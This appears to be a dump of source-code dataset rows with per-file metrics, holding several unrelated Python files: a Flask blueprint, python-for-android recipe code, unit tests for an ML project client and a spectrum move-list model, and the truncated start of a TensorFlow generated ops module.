| 15.9 | 49 | 0.773585 | 18 | 159 | 6.833333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029851 | 0.157233 | 159 | 9 | 50 | 17.666667 | 0.88806 | 0.465409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
dbef333aea7202c524932785ca07129547d78bdf | 43 | py | Python | vnpy/gateway/coincap/__init__.py | xingtian888/vnpy | a7c7b22a1c73b28ace4225b66a374c586a5221be | [
"MIT"
] | null | null | null | vnpy/gateway/coincap/__init__.py | xingtian888/vnpy | a7c7b22a1c73b28ace4225b66a374c586a5221be | [
"MIT"
] | null | null | null | vnpy/gateway/coincap/__init__.py | xingtian888/vnpy | a7c7b22a1c73b28ace4225b66a374c586a5221be | [
"MIT"
] | null | null | null | from .coincap_gateway import CoinCapGateway | 43 | 43 | 0.906977 | 5 | 43 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e0265a53272d9ea5a14c360c2634d7da4ed487e7 | 96 | py | Python | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_block_docstring.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_block_docstring.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_block_docstring.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/74/1b/ab/0633a9e085e848921b083d2496012fdf3cff0e97d913cc73f965b6b244 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.447917 | 0 | 96 | 1 | 96 | 96 | 0.447917 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e03c6235425d2f234c472ff095684e9e9c024175 | 34 | py | Python | alarme/extras/sensor/web/__init__.py | insolite/alarme | 2312e88299a07d47435f475e5617213404e6d365 | [
"MIT"
] | null | null | null | alarme/extras/sensor/web/__init__.py | insolite/alarme | 2312e88299a07d47435f475e5617213404e6d365 | [
"MIT"
] | 1 | 2017-02-04T13:03:05.000Z | 2017-02-04T13:03:05.000Z | alarme/extras/sensor/web/__init__.py | insolite/alarme | 2312e88299a07d47435f475e5617213404e6d365 | [
"MIT"
] | null | null | null | from .web_sensor import WebSensor
| 17 | 33 | 0.852941 | 5 | 34 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0eb7bbea23a7b1342db678d15ba401889ace2df3 | 3,417 | py | Python | mlcycle/tests/test_project.py | cemizm/mlcycle-pyclient | 2494d6eb5b841049e05163edec560627ffe5a197 | [
"MIT"
] | null | null | null | mlcycle/tests/test_project.py | cemizm/mlcycle-pyclient | 2494d6eb5b841049e05163edec560627ffe5a197 | [
"MIT"
] | null | null | null | mlcycle/tests/test_project.py | cemizm/mlcycle-pyclient | 2494d6eb5b841049e05163edec560627ffe5a197 | [
"MIT"
] | null | null | null | import mlcycle
import dataclasses
import unittest
from httmock import all_requests, HTTMock
@all_requests
def get_all(url, request):
    return {'status_code': 200, 'content': '[{"name": "Project 1","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}]'}
@all_requests
def get_by_id(url, request):
    return {'status_code': 200, 'content': '{"name": "Project 1","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}'}
@all_requests
def add(url, request):
    return {'status_code': 200, 'content': '{"name": "Project 1","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}'}
@all_requests
def update(url, request):
    return {'status_code': 200, 'content': '{"name": "Project 2","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}'}
@all_requests
def delete(url, request):
    return {'status_code': 200}
class TestProject(unittest.TestCase):
def setUp(self):
self.client = mlcycle.init_with("https://192.168.99.100:5001/api")
def test_get_all(self):
with HTTMock(get_all):
project = mlcycle.models.Project(name="Project 1", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.get_all()
self.assertTrue(dataclasses.is_dataclass(resp[0]))
self.assertEqual(resp[0], project)
def test_get_by_id(self):
with HTTMock(get_by_id):
project = mlcycle.models.Project(name="Project 1", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.get_by_id("4efab54c-1571-480f-b4dc-d7c00948b7f8")
self.assertTrue(dataclasses.is_dataclass(resp))
self.assertEqual(resp, project)
def test_add(self):
with HTTMock(add):
project = mlcycle.models.Project(name="Project 1", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.add(project)
self.assertTrue(dataclasses.is_dataclass(resp))
self.assertEqual(resp, project)
def test_update(self):
with HTTMock(update):
project = mlcycle.models.Project(name="Project 2", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.update(project.id, project)
self.assertTrue(dataclasses.is_dataclass(resp))
self.assertEqual(resp, project)
def test_delete(self):
with HTTMock(delete):
project = mlcycle.models.Project(name="Project 2", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.delete(project.id)
self.assertTrue(resp)
def test_check(self):
project = mlcycle.models.Project(name="Project 2", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
self.client.Projects.check(project)
self.assertTrue(True)
if __name__ == '__main__':
unittest.main() | 46.808219 | 179 | 0.68686 | 434 | 3,417 | 5.31106 | 0.165899 | 0.047722 | 0.104121 | 0.117137 | 0.756182 | 0.756182 | 0.725813 | 0.725813 | 0.725813 | 0.704989 | 0 | 0.093999 | 0.156277 | 3,417 | 73 | 180 | 46.808219 | 0.705515 | 0 | 0 | 0.333333 | 0 | 0.070175 | 0.36103 | 0.119661 | 0 | 0 | 0 | 0 | 0.175439 | 1 | 0.210526 | false | 0 | 0.070175 | 0.087719 | 0.385965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
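The suite above leans on httmock's decorator-based interception: a function decorated with @all_requests, activated inside an HTTMock context, answers every HTTP request issued through the requests library. A self-contained sketch of the same pattern (the URL is illustrative and never contacted):

import requests
from httmock import HTTMock, all_requests

@all_requests
def fake_response(url, request):
    # Canned reply returned for any request made inside the HTTMock block.
    return {'status_code': 200, 'content': '{"ok": true}'}

with HTTMock(fake_response):
    resp = requests.get('https://example.invalid/api')
    print(resp.status_code)  # 200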
0ed3576997599b8f0b0129dc37bd17205b594cd3 | 7,792 | py | Python | src/harness/reference_models/dpa/move_list_test.py | NSF-Swift/Spectrum-Access-System | 02cf3490c9fd0cec38074d3bdb3bca63bb7d03bf | [
"Apache-2.0"
] | 58 | 2015-07-22T14:16:52.000Z | 2022-03-10T09:09:33.000Z | src/harness/reference_models/dpa/move_list_test.py | NSF-Swift/Spectrum-Access-System | 02cf3490c9fd0cec38074d3bdb3bca63bb7d03bf | [
"Apache-2.0"
] | 537 | 2015-07-30T16:28:20.000Z | 2021-09-30T17:12:15.000Z | src/harness/reference_models/dpa/move_list_test.py | NSF-Swift/Spectrum-Access-System | 02cf3490c9fd0cec38074d3bdb3bca63bb7d03bf | [
"Apache-2.0"
] | 51 | 2015-06-30T00:25:15.000Z | 2022-01-21T00:09:22.000Z | # Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
import os
import unittest
import numpy as np
from reference_models.dpa import move_list
from reference_models.propagation import wf_itm
from reference_models.tools import entities
from reference_models.tools import testutils
# A Protection point namedtuple as required by input
ProtectionPoint = namedtuple('ProtectionPoint', ['latitude', 'longitude'])
class TestDpa(unittest.TestCase):
def setUp(self):
self.original_itm = wf_itm.CalcItmPropagationLoss
def tearDown(self):
wf_itm.CalcItmPropagationLoss = self.original_itm
def test_movelist_single_grant(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+30-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
# Within the move list
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_A_OUTDOOR,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=19.97, max_distance_km=19.98),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3600e6, 3610e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, grants)
# Outside the move list
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_A_OUTDOOR,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=20.1, max_distance_km=20.2),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3600e6, 3610e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
def test_movelist_oob_cata(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km for OOB power -25dBm
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-25)-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_A_OUTDOOR,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=10, max_distance_km=11),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, [])
self.assertListEqual(move_grants, [])
def test_movelist_oob_catb(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km for OOB power -15dBm/10MHz
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-15+8)-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
# Within move list for power
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=19.97, max_distance_km=19.98),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, grants)
# Outside the move list for power
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=20.1, max_distance_km=20.2),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
# Outside the nbor list for distance. -144 at 30km
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-15+8)-0.1) - 20.0)
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=25.1, max_distance_km=25.2),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, [])
self.assertListEqual(move_grants, [])
def test_movelist_oob_purge_catb(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km for OOB power -3dBm/10MHz
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-13+10+8)-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
# Within move list for power
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=19.97, max_distance_km=19.98),
min_freq_mhz=3550,
max_freq_mhz=3570,
chunks_mhz=5)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, grants)
# However only using the last 2 would be out of move list
grants = grants[2:]
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
# Slightly lower than the cutoff power -> none in move list
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=20.1, max_distance_km=20.2),
min_freq_mhz=3550,
max_freq_mhz=3570,
chunks_mhz=5)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
if __name__ == '__main__':
unittest.main()
| 37.104762 | 77 | 0.69212 | 1,012 | 7,792 | 5.123518 | 0.193676 | 0.034716 | 0.030087 | 0.034716 | 0.785921 | 0.774349 | 0.774349 | 0.774349 | 0.774349 | 0.770878 | 0 | 0.102597 | 0.209446 | 7,792 | 209 | 78 | 37.282297 | 0.739123 | 0.151181 | 0 | 0.816901 | 0 | 0 | 0.009113 | 0 | 0 | 0 | 0 | 0 | 0.126761 | 1 | 0.042254 | false | 0 | 0.056338 | 0 | 0.105634 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
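These tests stub out the ITM propagation model by hand: setUp stashes the real CalcItmPropagationLoss, each test assigns a FakePropagationPredictor in its place, and tearDown restores the original so later tests are unaffected. The same save/patch/restore pattern in isolation, here patching a stdlib function purely for illustration:

import math
import unittest

class PatchedFunctionTest(unittest.TestCase):
    def setUp(self):
        # Keep a handle to the real implementation...
        self.original_sqrt = math.sqrt

    def tearDown(self):
        # ...and always restore it, even if the test fails.
        math.sqrt = self.original_sqrt

    def test_with_fake(self):
        math.sqrt = lambda x: 42.0  # deterministic stand-in
        self.assertEqual(math.sqrt(9), 42.0)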
161109586b4014c595bff02c5134d8ea3db17127 | 6,055 | py | Python | recipes/android/__init__.py | Janith96/lbry-android | b44770c77fc6103a7f366fac3446366365a74fea | [
"MIT"
] | 4 | 2019-07-09T17:50:46.000Z | 2019-12-07T08:37:58.000Z | recipes/android/__init__.py | Janith96/lbry-android | b44770c77fc6103a7f366fac3446366365a74fea | [
"MIT"
] | 4 | 2020-07-17T01:37:37.000Z | 2020-07-21T14:21:08.000Z | recipes/android/__init__.py | Janith96/lbry-android | b44770c77fc6103a7f366fac3446366365a74fea | [
"MIT"
] | 3 | 2020-02-21T04:34:20.000Z | 2021-03-19T22:32:38.000Z | from pythonforandroid.recipe import CythonRecipe, IncludedFilesBehaviour
from pythonforandroid.util import current_directory
from pythonforandroid.patching import will_build
from pythonforandroid import logger
from os.path import join
class AndroidRecipe(IncludedFilesBehaviour, CythonRecipe):
# name = 'android'
version = None
url = None
src_filename = 'src'
depends = [('pygame', 'sdl2', 'genericndkbuild'), ('python2', 'python3crystax')]
config_env = {}
def get_recipe_env(self, arch):
env = super(AndroidRecipe, self).get_recipe_env(arch)
env.update(self.config_env)
return env
def prebuild_arch(self, arch):
super(AndroidRecipe, self).prebuild_arch(arch)
tpxi = 'DEF {} = {}\n'
th = '#define {} {}\n'
tpy = '{} = {}\n'
bootstrap = bootstrap_name = self.ctx.bootstrap.name
is_sdl2 = bootstrap_name in ('sdl2', 'sdl2python3', 'sdl2_gradle')
is_pygame = bootstrap_name in ('pygame',)
is_webview = bootstrap_name in ('webview',)
is_lbry = bootstrap_name in ('lbry',)
if is_sdl2 or is_webview or is_lbry:
if is_sdl2:
bootstrap = 'sdl2'
java_ns = 'org.kivy.android'
jni_ns = 'org/kivy/android'
elif is_pygame:
java_ns = 'org.renpy.android'
jni_ns = 'org/renpy/android'
else:
logger.error('unsupported bootstrap for android recipe: {}'.format(bootstrap_name))
exit(1)
config = {
'BOOTSTRAP': bootstrap,
'IS_SDL2': int(is_sdl2),
'IS_PYGAME': int(is_pygame),
'PY2': int(will_build('python2')(self)),
'JAVA_NAMESPACE': java_ns,
'JNI_NAMESPACE': jni_ns,
}
with current_directory(self.get_build_dir(arch.arch)):
with open(join('android', 'config.pxi'), 'w') as fpxi:
with open(join('android', 'config.h'), 'w') as fh:
with open(join('android', 'config.py'), 'w') as fpy:
for key, value in config.items():
fpxi.write(tpxi.format(key, repr(value)))
fpy.write(tpy.format(key, repr(value)))
fh.write(th.format(key, value if isinstance(value, int)
else '"{}"'.format(value)))
self.config_env[key] = str(value)
if is_sdl2:
fh.write('JNIEnv *SDL_AndroidGetJNIEnv(void);\n')
fh.write('#define SDL_ANDROID_GetJNIEnv SDL_AndroidGetJNIEnv\n')
elif is_pygame:
fh.write('JNIEnv *SDL_ANDROID_GetJNIEnv(void);\n')
recipe = AndroidRecipe()
'''
from pythonforandroid.recipe import CythonRecipe, Recipe, IncludedFilesBehaviour
from pythonforandroid.util import current_directory
from pythonforandroid.patching import will_build
from pythonforandroid import logger
from os.path import join
class AndroidRecipe(IncludedFilesBehaviour, CythonRecipe):
# name = 'android'
version = None
url = None
src_filename = 'src'
depends = [('pygame', 'sdl2', 'genericndkbuild'), ('python2', 'python3crystax')]
call_hostpython_via_targetpython = False
config_env = {}
def get_recipe_env(self, arch):
env = super(AndroidRecipe, self).get_recipe_env(arch)
env.update(self.config_env)
target_python = Recipe.get_recipe('python2', self.ctx).get_build_dir(arch.arch)
env['PYTHON_ROOT'] = join(target_python, 'python-install')
env['CFLAGS'] += ' -I' + env['PYTHON_ROOT'] + '/include/python2.7'
env['LDFLAGS'] += ' -L' + env['PYTHON_ROOT'] + '/lib' + ' -lpython2.7'
return env
def prebuild_arch(self, arch):
super(AndroidRecipe, self).prebuild_arch(arch)
tpxi = 'DEF {} = {}\n'
th = '#define {} {}\n'
tpy = '{} = {}\n'
bootstrap = bootstrap_name = self.ctx.bootstrap.name
is_sdl2 = bootstrap_name in ('sdl2', 'sdl2python3')
is_pygame = bootstrap_name in ('pygame',)
        is_webview = bootstrap_name in ('webview',)
        is_lbry = bootstrap_name in ('lbry',)
if is_sdl2 or is_webview or is_lbry:
if is_sdl2:
bootstrap = 'sdl2'
java_ns = 'org.kivy.android'
jni_ns = 'org/kivy/android'
elif is_pygame:
java_ns = 'org.renpy.android'
jni_ns = 'org/renpy/android'
else:
logger.error('unsupported bootstrap for android recipe: {}'.format(bootstrap_name))
exit(1)
config = {
'BOOTSTRAP': bootstrap,
'IS_SDL2': int(is_sdl2),
'IS_PYGAME': int(is_pygame),
'PY2': int(will_build('python2')(self)),
'JAVA_NAMESPACE': java_ns,
'JNI_NAMESPACE': jni_ns,
}
with current_directory(self.get_build_dir(arch.arch)):
with open(join('android', 'config.pxi'), 'w') as fpxi:
with open(join('android', 'config.h'), 'w') as fh:
with open(join('android', 'config.py'), 'w') as fpy:
for key, value in config.items():
fpxi.write(tpxi.format(key, repr(value)))
fpy.write(tpy.format(key, repr(value)))
fh.write(th.format(key, value if isinstance(value, int)
else '"{}"'.format(value)))
self.config_env[key] = str(value)
if is_sdl2:
fh.write('JNIEnv *SDL_AndroidGetJNIEnv(void);\n')
fh.write('#define SDL_ANDROID_GetJNIEnv SDL_AndroidGetJNIEnv\n')
elif is_pygame:
fh.write('JNIEnv *SDL_ANDROID_GetJNIEnv(void);\n')
recipe = AndroidRecipe()
''' | 36.475904 | 95 | 0.555574 | 655 | 6,055 | 4.961832 | 0.172519 | 0.056 | 0.036923 | 0.035077 | 0.936308 | 0.903385 | 0.903385 | 0.903385 | 0.903385 | 0.903385 | 0 | 0.009257 | 0.322048 | 6,055 | 166 | 96 | 36.475904 | 0.78246 | 0.002642 | 0 | 0.066667 | 0 | 0 | 0.171842 | 0.036697 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.083333 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
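Both recipe variants above write config.pxi, config.h and config.py through three nested with-open blocks; contextlib.ExitStack from the standard library expresses the same thing without the nesting. A hedged sketch of that alternative (file names mirror the recipe; it assumes an existing android/ directory and a populated config dict):

import contextlib
from os.path import join

config = {'BOOTSTRAP': 'sdl2', 'IS_SDL2': 1}
with contextlib.ExitStack() as stack:
    fpxi = stack.enter_context(open(join('android', 'config.pxi'), 'w'))
    fh = stack.enter_context(open(join('android', 'config.h'), 'w'))
    fpy = stack.enter_context(open(join('android', 'config.py'), 'w'))
    for key, value in config.items():
        fpxi.write('DEF {} = {}\n'.format(key, repr(value)))
        fpy.write('{} = {}\n'.format(key, repr(value)))
        fh.write('#define {} {}\n'.format(key, value if isinstance(value, int) else '"{}"'.format(value)))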
16358a88632dcd19e077b1b1ad756253bcba5bcc | 157 | py | Python | app/main/__init__.py | Alikutepa/News-API | f7073d4b935caef14317783444707bb86478ee6b | [
"MIT"
] | null | null | null | app/main/__init__.py | Alikutepa/News-API | f7073d4b935caef14317783444707bb86478ee6b | [
"MIT"
] | null | null | null | app/main/__init__.py | Alikutepa/News-API | f7073d4b935caef14317783444707bb86478ee6b | [
"MIT"
] | null | null | null | from flask import Blueprint
from flask.app import Flask
from flask_bootstrap import Blueprint
main = Blueprint('main', __name__)
# imported after `main` is defined so the view modules can import it
from . import views, error
| 19.625 | 37 | 0.802548 | 22 | 157 | 5.5 | 0.454545 | 0.223141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140127 | 157 | 7 | 38 | 22.428571 | 0.896296 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0.6 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
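A blueprint module like this only defines routes; the application still has to register it. A minimal self-contained sketch of the usual counterpart (the route and names are illustrative, not taken from this repository):

from flask import Blueprint, Flask

main = Blueprint('main', __name__)

@main.route('/')
def index():
    return 'hello'

app = Flask(__name__)
app.register_blueprint(main)  # routes on `main` become part of the app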
163e98c30db56e297c767a175c75a83901d2ea2e | 40 | py | Python | FactorKeeperClient/gen_factor/__init__.py | JayceSYH/FactorKeeper | c4711c0691aed89b8f38ba47faabbfa40b18c74f | [
"MIT"
] | null | null | null | FactorKeeperClient/gen_factor/__init__.py | JayceSYH/FactorKeeper | c4711c0691aed89b8f38ba47faabbfa40b18c74f | [
"MIT"
] | null | null | null | FactorKeeperClient/gen_factor/__init__.py | JayceSYH/FactorKeeper | c4711c0691aed89b8f38ba47faabbfa40b18c74f | [
"MIT"
] | null | null | null | from .factor_gen import factor_generator | 40 | 40 | 0.9 | 6 | 40 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 40 | 1 | 40 | 40 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1666d2fe72fd06a9714eb0cdfd479cc7851d8222 | 10,250 | py | Python | lesson7.4/tensorflow/python/ops/gen_bitwise_ops.py | magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda | cc226deb7b46852407900f9fec0caf62638defe2 | [
"MIT"
] | 21 | 2018-12-11T20:07:47.000Z | 2021-11-08T13:12:32.000Z | lesson7.4/tensorflow/python/ops/gen_bitwise_ops.py | magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda | cc226deb7b46852407900f9fec0caf62638defe2 | [
"MIT"
] | 1 | 2020-07-07T21:30:02.000Z | 2020-07-08T18:16:03.000Z | lesson7.4/tensorflow/python/ops/gen_bitwise_ops.py | magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda | cc226deb7b46852407900f9fec0caf62638defe2 | [
"MIT"
] | 15 | 2018-12-12T02:32:28.000Z | 2021-11-05T20:40:10.000Z | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: bitwise_ops.cc
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
